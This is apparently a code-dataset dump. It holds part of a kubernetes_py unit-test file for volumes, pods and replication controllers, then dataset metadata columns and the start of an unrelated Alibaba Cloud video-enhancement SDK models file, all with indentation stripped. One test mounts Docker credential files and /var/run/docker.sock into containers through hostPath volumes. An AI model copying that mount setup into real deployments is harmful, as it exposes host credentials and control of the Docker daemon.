fs_type = "xfs"
vol = K8sVolume(name=name, type=type)
vol.fs_type = fs_type
self.assertEqual(vol.fs_type, fs_type)
def test_gce_set_fs_type(self):
name = "yoname"
type = "gcePersistentDisk"
fs_type = "xfs"
vol = K8sVolume(name=name, type=type)
vol.fs_type = fs_type
self.assertEqual(vol.fs_type, fs_type)
# --------------------------------------------------------------------------------- nfs
def test_nfs_init(self):
name = "yoname"
type = "nfs"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, NFSVolumeSource)
def test_nfs_set_server_none(self):
name = "yoname"
type = "nfs"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.nfs_server = None
def test_nfs_set_server_invalid(self):
name = "yoname"
type = "nfs"
server = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.nfs_server = server
def test_nfs_set_server_invalid_type(self):
name = "yoname"
type = "emptyDir"
server = "nfs.company.com"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.nfs_server = server
def test_nfs_set_server(self):
name = "yoname"
type = "nfs"
server = "nfs.company.com"
vol = K8sVolume(name=name, type=type)
vol.nfs_server = server
self.assertEqual(vol.nfs_server, server)
# --------------------------------------------------------------------------------- repository (gitRepo)
def test_git_repo_init(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, GitRepoVolumeSource)
def test_git_repo_set_repo_none(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_repository = None
def test_git_repo_set_repo_invalid(self):
name = "yoname"
type = "gitRepo"
repo = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_repository = repo
def test_git_set_repo_invalid_type(self):
name = "yoname"
type = "emptyDir"
repo = "git@somewhere:me/my-git-repository.git"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.git_repository = repo
def test_git_set_repo(self):
name = "yoname"
type = "gitRepo"
repo = "git@somewhere:me/my-git-repository.git"
vol = K8sVolume(name=name, type=type)
vol.git_repository = repo
self.assertEqual(vol.git_repository, repo)
# --------------------------------------------------------------------------------- revision (gitRepo)
def test_git_set_revision_none(self):
name = "yoname"
type = "gitRepo"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_revision = None
def test_git_set_revision_invalid(self):
name = "yoname"
type = "gitRepo"
rev = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.git_revision = rev
def test_git_set_revision_invalid_type(self):
name = "yoname"
type = "emptyDir"
rev = "22f1d8406d464b0c0874075539c1f2e96c253775"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.git_revision = rev
def test_git_set_revision(self):
name = "yoname"
type = "gitRepo"
rev = "22f1d8406d464b0c0874075539c1f2e96c253775"
vol = K8sVolume(name=name, type=type)
vol.git_revision = rev
self.assertEqual(vol.git_revision, rev)
# --------------------------------------------------------------------------------- api - pod - emptydir
def test_pod_emptydir(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "emptydir"
vol_type = "emptyDir"
volume = _utils.create_volume(name=vol_name, type=vol_type)
mount_name = vol_name
mount_path = '/test-emptydir'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - hostpath
def test_pod_hostpath(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "hostpath"
vol_type = "hostPath"
host_path = "/var/lib/docker"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.path = host_path
mount_name = vol_name
mount_path = '/test-hostpath'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - secret
def test_pod_secret(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
secret_name = "yosecret"
secret = _utils.create_secret(name=secret_name)
k = ".secret-file"
v = "dmFsdWUtMg0KDQo="
secret.data = {k: v}
vol_name = "secret"
vol_type = "secret"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.secret_name = secret_name
mount_name = vol_name
mount_path = '/test-secret'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx"
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
secret.create()
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - pod - aws ebs
def test_pod_aws_ebs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
volume_id = "vol-0e3056a2"
vol_name = "ebs"
vol_type = "awsElasticBlockStore"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.volume_id = volume_id
mount_name = vol_name
mount_path = '/test-aws'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - pod - gce pd
def test_pod_gce_pd(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
pd_name = "kubernetes_py-py-test-pd"
vol_name = "persistent"
vol_type = "gcePersistentDisk"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.pd_name = pd_name
mount_name = vol_name
mount_path = '/test-gce'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - pod - nfs
def test_pod_nfs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "nfs"
vol_type = "nfs"
server = "howard.mtl.mnubo.com"
nfs_path = "/fs1/test-nfs"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.nfs_server = server
volume.nfs_path = nfs_path
mount_name = vol_name
mount_path = '/test-nfs'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - pod - gitRepo
def test_pod_git_repo(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "git-repo"
vol_type = "gitRepo"
repo = "https://user:pass@somewhere/repo.git"
revision = "e42d3dca1541ba085f34ce282feda1109a707c7b"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.git_repository = repo
volume.git_revision = revision
mount_name = vol_name
mount_path = '/test-git'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - emptydir
def test_rc_emptydir(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "emptydir"
vol_type = "emptyDir"
volume = _utils.create_volume(name=vol_name, type=vol_type)
mount_name = vol_name
mount_path = '/test-emptydir'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - rc - hostpath
def test_rc_hostpath(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "hostpath"
vol_type = "hostPath"
hostpath = "/var/lib/docker"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.path = hostpath
mount_name = vol_name
mount_path = '/test-hostpath'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
def test_rc_hostpath_list(self):
volumes = [
{'hostPath': {'path': '/root/.dockercfg'}, 'name': 'dockercred'},
{'hostPath': {'path': '/usr/bin/docker'}, 'name': 'dockerbin'},
{'hostPath': {'path': '/var/run/docker.sock'}, 'name': 'dockersock'},
{'hostPath': {'path': '/root/.docker'}, 'name': 'dockerconfig'}
]
rc = _utils.create_rc(name="admintool")
for vol in volumes:
keys = list(filter(lambda x: x != 'name', vol.keys()))
v = K8sVolume(
name=vol['name'],
type=keys[0],
)
dico = vol[keys[0]]
if dico is not None:
v.path = dico['path']
rc.add_volume(v)
self.assertEqual(len(volumes), len(rc.volumes))
for i in range(0, len(volumes)):
self.assertEqual(volumes[i]['name'], rc.volumes[i].name)
self.assertEqual(volumes[i]['hostPath']['path'], rc.volumes[i].hostPath.path)
# --------------------------------------------------------------------------------- api - rc - secret
def test_rc_secret(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
secret_name = "yosecret"
secret = _utils.create_secret(name=secret_name)
k = ".secret-file"
v = "dmFsdWUtMg0KDQo="
secret.data = {k: v}
vol_name = "secret"
vol_type = "secret"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.secret_name = secret_name
mount_name = vol_name
mount_path = '/test-secret'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
secret.create()
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - rc - aws ebs
def test_rc_aws_ebs(self):
# http://kubernetes.io/docs/user-guide/volumes/#awselasticblockstore
# - the nodes on which pods are running must be AWS EC2 instances
# - those instances need to be in the same region and availability-zone as the EBS volume
# - EBS only supports a single EC2 instance mounting a volume
# Pod creation will timeout waiting for readiness if not on AWS; unschedulable.
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
volume_id = "vol-0e3056a2"
vol_name = "ebs"
vol_type = "awsElasticBlockStore"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.volume_id = volume_id
mount_name = vol_name
mount_path = '/test-aws'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - gce pd
def test_rc_gce_pd(self):
# http://kubernetes.io/docs/user-guide/volumes/#gcepersistentdisk
# - the nodes on which pods are running must be GCE VMs
# - those VMs need to be in the same GCE project and zone as the PD
# Pod creation will timeout waiting for readiness if not on GCE; unschedulable.
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
pd_name = "mnubo-disk1"
vol_name = "persistent"
vol_type = "gcePersistentDisk"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.pd_name = pd_name
volume.read_only = True # HTTP 422: GCE PD can only be mounted on multiple machines if it is read-only
mount_name = vol_name
mount_path = '/test-gce'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - nfs
def test_rc_nfs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "nfs"
vol_type = "nfs"
server = "howard.mtl.mnubo.com"
path = "/fs1/test-nfs"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.nfs_server = server
volume.nfs_path = path
mount_name = vol_name
mount_path = '/test-nfs'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - gitRepo
def test_rc_git_repo(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "git-repo"
vol_type = "gitRepo"
repo = "https://user:pass@somewhere/repo.git"
revision = "e42d3dca1541ba085f34ce282feda1109a707c7b"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.git_repository = repo
volume.git_revision = revision
mount_name = vol_name
mount_path = '/test-git'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
| 36.008163
| 111
| 0.593148
| 3,892
| 35,288
| 5.143628
| 0.062179
| 0.022728
| 0.04161
| 0.043159
| 0.845647
| 0.814876
| 0.780758
| 0.74749
| 0.71532
| 0.697587
| 0
| 0.013601
| 0.258275
| 35,288
| 979
| 112
| 36.044944
| 0.751242
| 0.09397
| 0
| 0.776913
| 0
| 0
| 0.079896
| 0.010116
| 0
| 0
| 0
| 0
| 0.128405
| 1
| 0.0869
| false
| 0.005188
| 0.020752
| 0
| 0.108949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6718a3aea8573133a9e43ad80c59db9fbf6e8c4b
| 31,163
|
py
|
Python
|
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
class ChangeVideoSizeRequest(TeaModel):
    """Request model for the ChangeVideoSize API."""

    def __init__(self, video_url=None, width=None, height=None, crop_type=None, fill_type=None, tightness=None, r=None, g=None, b=None):
        self.video_url = video_url      # required
        self.width = width              # required
        self.height = height            # required
        self.crop_type = crop_type
        self.fill_type = fill_type
        self.tightness = tightness
        self.r = r
        self.g = g
        self.b = b

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.width, 'width')
        self.validate_required(self.height, 'height')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['VideoUrl'] = self.video_url
        result['Width'] = self.width
        result['Height'] = self.height
        result['CropType'] = self.crop_type
        result['FillType'] = self.fill_type
        result['Tightness'] = self.tightness
        result['R'] = self.r
        result['G'] = self.g
        result['B'] = self.b
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.video_url = map.get('VideoUrl')
        self.width = map.get('Width')
        self.height = map.get('Height')
        self.crop_type = map.get('CropType')
        self.fill_type = map.get('FillType')
        self.tightness = map.get('Tightness')
        self.r = map.get('R')
        self.g = map.get('G')
        self.b = map.get('B')
        return self
class ChangeVideoSizeResponse(TeaModel):
    """Response model for the ChangeVideoSize API."""

    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # ChangeVideoSizeResponseData or None

    def validate(self):
        """Validate required fields and recurse into `data` when present."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()

    def to_map(self):
        """Serialize this model (and nested data) to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        if self.data is not None:
            result['Data'] = self.data.to_map()
        else:
            result['Data'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.request_id = map.get('RequestId')
        if map.get('Data') is not None:
            temp_model = ChangeVideoSizeResponseData()
            self.data = temp_model.from_map(map['Data'])
        else:
            self.data = None
        return self
class ChangeVideoSizeResponseData(TeaModel):
    """Payload of a ChangeVideoSize response: output video and cover URLs."""

    def __init__(self, video_url=None, video_cover_url=None):
        self.video_url = video_url
        self.video_cover_url = video_cover_url

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.video_cover_url, 'video_cover_url')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['VideoUrl'] = self.video_url
        result['VideoCoverUrl'] = self.video_cover_url
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.video_url = map.get('VideoUrl')
        self.video_cover_url = map.get('VideoCoverUrl')
        return self
class ChangeVideoSizeAdvanceRequest(TeaModel):
    """Advance (upload-object) variant of the ChangeVideoSize request."""

    def __init__(self, video_url_object=None, width=None, height=None, crop_type=None, fill_type=None, tightness=None, r=None, g=None, b=None):
        self.video_url_object = video_url_object  # required: uploadable object instead of a URL
        self.width = width                        # required
        self.height = height                      # required
        self.crop_type = crop_type
        self.fill_type = fill_type
        self.tightness = tightness
        self.r = r
        self.g = g
        self.b = b

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.video_url_object, 'video_url_object')
        self.validate_required(self.width, 'width')
        self.validate_required(self.height, 'height')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['VideoUrlObject'] = self.video_url_object
        result['Width'] = self.width
        result['Height'] = self.height
        result['CropType'] = self.crop_type
        result['FillType'] = self.fill_type
        result['Tightness'] = self.tightness
        result['R'] = self.r
        result['G'] = self.g
        result['B'] = self.b
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.video_url_object = map.get('VideoUrlObject')
        self.width = map.get('Width')
        self.height = map.get('Height')
        self.crop_type = map.get('CropType')
        self.fill_type = map.get('FillType')
        self.tightness = map.get('Tightness')
        self.r = map.get('R')
        self.g = map.get('G')
        self.b = map.get('B')
        return self
class GenerateVideoRequest(TeaModel):
    """Request model for the GenerateVideo API."""

    def __init__(self, file_list=None, scene=None, width=None, height=None, style=None, duration=None, duration_adaption=None, transition_style=None, smart_effect=None, puzzle_effect=None, mute=None):
        # Bug fix: the generated code discarded the caller's file_list
        # (always assigning []); honor it when provided.
        self.file_list = file_list if file_list is not None else []
        self.scene = scene
        self.width = width
        self.height = height
        self.style = style
        self.duration = duration
        self.duration_adaption = duration_adaption
        self.transition_style = transition_style
        self.smart_effect = smart_effect
        self.puzzle_effect = puzzle_effect
        self.mute = mute

    def validate(self):
        """Require a non-empty file_list and validate each entry."""
        self.validate_required(self.file_list, 'file_list')
        if self.file_list:
            for k in self.file_list:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize this model (and each file-list entry) to a wire-format dict."""
        result = {}
        result['FileList'] = []
        if self.file_list is not None:
            for k in self.file_list:
                result['FileList'].append(k.to_map() if k else None)
        else:
            result['FileList'] = None
        result['Scene'] = self.scene
        result['Width'] = self.width
        result['Height'] = self.height
        result['Style'] = self.style
        result['Duration'] = self.duration
        result['DurationAdaption'] = self.duration_adaption
        result['TransitionStyle'] = self.transition_style
        result['SmartEffect'] = self.smart_effect
        result['PuzzleEffect'] = self.puzzle_effect
        result['Mute'] = self.mute
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.file_list = []
        if map.get('FileList') is not None:
            for k in map.get('FileList'):
                temp_model = GenerateVideoRequestFileList()
                temp_model = temp_model.from_map(k)
                self.file_list.append(temp_model)
        else:
            self.file_list = None
        self.scene = map.get('Scene')
        self.width = map.get('Width')
        self.height = map.get('Height')
        self.style = map.get('Style')
        self.duration = map.get('Duration')
        self.duration_adaption = map.get('DurationAdaption')
        self.transition_style = map.get('TransitionStyle')
        self.smart_effect = map.get('SmartEffect')
        self.puzzle_effect = map.get('PuzzleEffect')
        self.mute = map.get('Mute')
        return self
class GenerateVideoRequestFileList(TeaModel):
    """One input-file entry of a GenerateVideo request."""

    def __init__(self, file_url=None, file_name=None, type=None):
        self.file_url = file_url    # required
        self.file_name = file_name  # required
        self.type = type            # required; generated name shadows builtin, kept for compatibility

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.file_url, 'file_url')
        self.validate_required(self.file_name, 'file_name')
        self.validate_required(self.type, 'type')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['FileUrl'] = self.file_url
        result['FileName'] = self.file_name
        result['Type'] = self.type
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.file_url = map.get('FileUrl')
        self.file_name = map.get('FileName')
        self.type = map.get('Type')
        return self
class GenerateVideoResponse(TeaModel):
    """Response model for the GenerateVideo API."""

    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # GenerateVideoResponseData or None

    def validate(self):
        """Validate required fields and recurse into `data` when present."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()

    def to_map(self):
        """Serialize this model (and nested data) to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        if self.data is not None:
            result['Data'] = self.data.to_map()
        else:
            result['Data'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.request_id = map.get('RequestId')
        if map.get('Data') is not None:
            temp_model = GenerateVideoResponseData()
            self.data = temp_model.from_map(map['Data'])
        else:
            self.data = None
        return self
class GenerateVideoResponseData(TeaModel):
    """Payload of a GenerateVideo response: output video and cover URLs."""

    def __init__(self, video_url=None, video_cover_url=None):
        self.video_url = video_url
        self.video_cover_url = video_cover_url

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.video_url, 'video_url')
        self.validate_required(self.video_cover_url, 'video_cover_url')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['VideoUrl'] = self.video_url
        result['VideoCoverUrl'] = self.video_cover_url
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.video_url = map.get('VideoUrl')
        self.video_cover_url = map.get('VideoCoverUrl')
        return self
class GetAsyncJobResultRequest(TeaModel):
    """Request model for polling an asynchronous job by its id."""

    def __init__(self, job_id=None):
        self.job_id = job_id  # required

    def validate(self):
        """Raise via TeaModel.validate_required if job_id is missing."""
        self.validate_required(self.job_id, 'job_id')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['JobId'] = self.job_id
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.job_id = map.get('JobId')
        return self
class GetAsyncJobResultResponse(TeaModel):
    """Response model for the GetAsyncJobResult API."""

    def __init__(self, request_id=None, data=None):
        self.request_id = request_id
        self.data = data  # GetAsyncJobResultResponseData or None

    def validate(self):
        """Validate required fields and recurse into `data` when present."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.data, 'data')
        if self.data:
            self.data.validate()

    def to_map(self):
        """Serialize this model (and nested data) to a wire-format dict."""
        result = {}
        result['RequestId'] = self.request_id
        if self.data is not None:
            result['Data'] = self.data.to_map()
        else:
            result['Data'] = None
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.request_id = map.get('RequestId')
        if map.get('Data') is not None:
            temp_model = GetAsyncJobResultResponseData()
            self.data = temp_model.from_map(map['Data'])
        else:
            self.data = None
        return self
class GetAsyncJobResultResponseData(TeaModel):
    """Payload of a GetAsyncJobResult response: job status and outcome."""

    def __init__(self, job_id=None, status=None, result=None, error_code=None, error_message=None):
        self.job_id = job_id
        self.status = status
        self.result = result
        self.error_code = error_code
        self.error_message = error_message

    def validate(self):
        """Raise via TeaModel.validate_required if a required field is missing."""
        self.validate_required(self.job_id, 'job_id')
        self.validate_required(self.status, 'status')
        self.validate_required(self.result, 'result')
        self.validate_required(self.error_code, 'error_code')
        self.validate_required(self.error_message, 'error_message')

    def to_map(self):
        """Serialize this model to a wire-format dict."""
        result = {}
        result['JobId'] = self.job_id
        result['Status'] = self.status
        result['Result'] = self.result
        result['ErrorCode'] = self.error_code
        result['ErrorMessage'] = self.error_message
        return result

    def from_map(self, map=None):
        """Populate this model from a wire-format dict; return self."""
        map = {} if map is None else map  # None default avoids the mutable-default pitfall
        self.job_id = map.get('JobId')
        self.status = map.get('Status')
        self.result = map.get('Result')
        self.error_code = map.get('ErrorCode')
        self.error_message = map.get('ErrorMessage')
        return self
class SuperResolveVideoRequest(TeaModel):
    """Request model for the SuperResolveVideo API."""

